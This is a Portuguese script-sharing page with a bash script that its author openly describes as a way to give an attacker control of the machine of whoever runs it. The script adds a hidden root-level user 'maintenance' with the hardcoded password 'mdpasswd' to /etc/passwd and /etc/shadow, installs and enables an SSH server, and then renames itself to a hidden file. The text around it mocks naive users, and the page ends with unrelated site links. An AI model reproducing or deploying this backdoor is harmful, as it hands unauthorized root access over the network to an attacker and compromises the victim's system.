Criando usuário com poderes de root
Publicado por Marcelo (última atualização em 17/10/2009)
[ Hits: 7.000 ]
Este script cria um usuário com poderes de root e ativa o ssh-server, dando ao atacante controle sobre o computador do executor do script.
Incrementando ele um pouco mais pode-se fazer maravilhas como, por exemplo, criar uma VPN diretamente entre o computador do atacante e do atacado (fugindo assim dos firewalls) e dando total acesso, através de ssh, e com poderes de super usuário ainda.
É, realmente o elo mais fraco da segurança da informação são as pessoas... administrador descuidado + usuário "bobinho" = caca!
#!/bin/bash # verifica se o usuário está como root if [ "`id -u`" != "0" ]; then echo 'Este script precisa ser executado como root. Digite "sudo su" para se logar como root e execute o script novamente.' read pausa exit 0 fi # verifica se o script de cadastro de senha existe, se não, ele mesmo o cria # o usuário será maintenance e a senha mdpasswd if [ "`find -name cad.main`" = "" ]; then touch cad.main echo "#!/usr/bin/expect" >> cad.main echo "set timeout 30" >> cad.main echo "spawn passwd maintenance" >> cad.main echo "set password \"mdpasswd"\" >> cad.main echo "expect \"Enter new UNIX password:"\" >> cad.main echo "send "\""$""password\r\"" >> cad.main echo "expect \"Retype new UNIX password:"\" >> cad.main echo "send "\""$""password\r\"" >> cad.main echo "send \"exit"\" >> cad.main echo "expect \"eof\"" >> cad.main chmod +x cad.main fi # verifica se o programa expect está instalado, se não estiver, ele o instala if [ "`dpkg -l | grep expect `" = "" ]; then aptitude install expect >> /dev/null fi # verifica se o servidor ssh está instalado, se não estiver, ele o instala if [ "`dpkg -l | grep openssh-server`" = "" ]; then aptitude install openssh-server >> /dev/null fi # verifica se já existe algum usuário com este nome, se existir ele alterará a senha deste usuário para mdpasswd if [ "`cat /etc/passwd | grep maintenance`" != "" ]; then expect cad.main >> /dev/null exit 0 fi # se o usuário não existir, ele será criado echo "maintenance:x:0:0:maintenance:/root:/bin/bash" >> /etc/passwd echo "maintenance:*:10091:0:99999:7:::" >> /etc/shadow expect cad.main >> /dev/null # remove o arquivo de cadastro de usuário rm -rf cad.min # oculta este script mv login.super .login.super exit 1
Monitore vários servidores ao mesmo tempo com Apache + shellscript
Simples inventário de máquinas em Shell Script
Pesquisa Binária usando Bash-Shell
Nenhum comentário foi encontrado.
Enviar mensagem ao usuário trabalhando com as opções do php.ini
Meu Fork do Plugin de Integração do CVS para o KDevelop
Compartilhando a tela do Computador no Celular via Deskreen
Como Configurar um Túnel SSH Reverso para Acessar Sua Máquina Local a Partir de uma Máquina Remota
Configuração para desligamento automatizado de Computadores em um Ambiente Comercial
Compartilhamento de Rede com samba em modo Público/Anônimo de forma simples, rápido e fácil
Cups: Mapear/listar todas as impressoras de outro Servidor CUPS de forma rápida e fácil
Criando uma VPC na AWS via CLI
Tem como instalar o gerenciador AMD Adrenalin no Ubuntu 24.04? (15)
Tenho dois Link's ( IP VÁLIDOS ), estou tentando fazer o failover... (0)
Pendrive não formata de jeito nenhum (4)